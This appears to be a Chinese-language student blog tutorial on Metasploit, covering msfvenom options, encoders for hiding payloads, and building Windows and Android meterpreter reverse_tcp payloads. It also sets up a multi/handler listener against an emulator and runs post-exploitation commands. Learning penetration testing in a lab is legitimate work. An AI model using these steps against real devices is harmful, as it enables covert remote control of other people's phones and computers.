MSF的使用

MSF的使用
GHSCMFS
Metasploit 简称(MSF)是一款流行的开源渗透测试框架,由Rapid7公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和Payload工具,可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台,包括Windows、Linux、MacOS等。直到今天Metasploit已成为众多黑客手中渗透攻击的利器,并在安全领域大展身手。
Metasploit框架主要包含以下几个组件:
模块库:包含了一系列攻击模块和Payload工具,用户可以利用这些模块快速构造攻击代码。
- Payload生成器:支持生成多种类型的Payload,包括反向Shell、Meterpreter、WebShell等。
- 渗透测试工具:支持多种渗透测试技术,包括端口扫描、漏洞扫描、密码破解等。
- 数据库:用于存储Metasploit框架的数据和攻击结果,包括模块信息、主机信息、漏洞信息等。
- 插件系统:支持自定义插件,可以扩展Metasploit的功能。
本次的環境
用的是Kali Linux (2024.1) , 內有MSF , 如果沒有安裝用:
1 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ |
查看Kali Linux 系统IP地址:
1 | ip addr |
可以ping一下確認是否能連接
1.開啟MFS
1 | msfconsole |
2.用到msfvenom命令
| 命令 | 功能 |
|---|---|
| -p | 指定需要使用的payload |
| -l | 列出指定模块的所有可用资源 |
| -n | 为payload预先指定一个NOP滑动长度,用于防止程序崩溃。 |
| -f | 指定输出格式,例如exe、elf、php、js等。 |
| -e | 指定需要使用的encoder编码器,以隐藏恶意代码。 |
| -a | 指定payload的目标架构,例如x86、x64等。 |
| –platform | 指定payload的目标平台,例如Windows、Linux等。 |
| -s | 设定有效攻击荷载的最大长度。 |
| -b | 设定规避字符集,以防止生成的payload中包含不可用字符。 |
| -i | 指定payload的编码次数。 |
| –shellest | 最小化生成payload。 |
例子:
1 | msfvenom -p android/meterpreter/reverse_tcp ... #這是指定android的 |
-e 编码器 :
| Encoder | 描述 |
|---|---|
| alphanum | 使用字母数字字符对代码进行编码。 |
| alpha_upper | 使用大写字母字符对代码进行编码。 |
| fnstenv_mov | 使用FPU指令对代码进行编码。 |
| jmp_call_additive | 使用跳转指令和调用指令对代码进行编码。 |
| nonalpha | 使用非字母字符对代码进行编码。 |
| nonupper | 使用非大写字母字符对代码进行编码。 |
| unicode_upper | 使用Unicode字符对代码进行编码。 |
原整例子:
1 | msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \ |
Android(舊版)
1 | msfvenom -p android/meterpreter/reverse_tcp \ |
生成後發去android機上, 小弟經費有限,只能用模擬器了(哭),下學期再買安卓
在kali下打開監聽程序:
1 | use exploit/multi/handler |
設置payload:
1 | set payload android/meterpreter/reverse_tcp |
設置IP和PORT:
1 | set lhost 127.0.0.1 |
啟動:
1 | run |
1 | app_list #查看app |
1 | app_run [package] #自己喜歡開什麼就開什麼 |
评论
匿名评论隐私政策




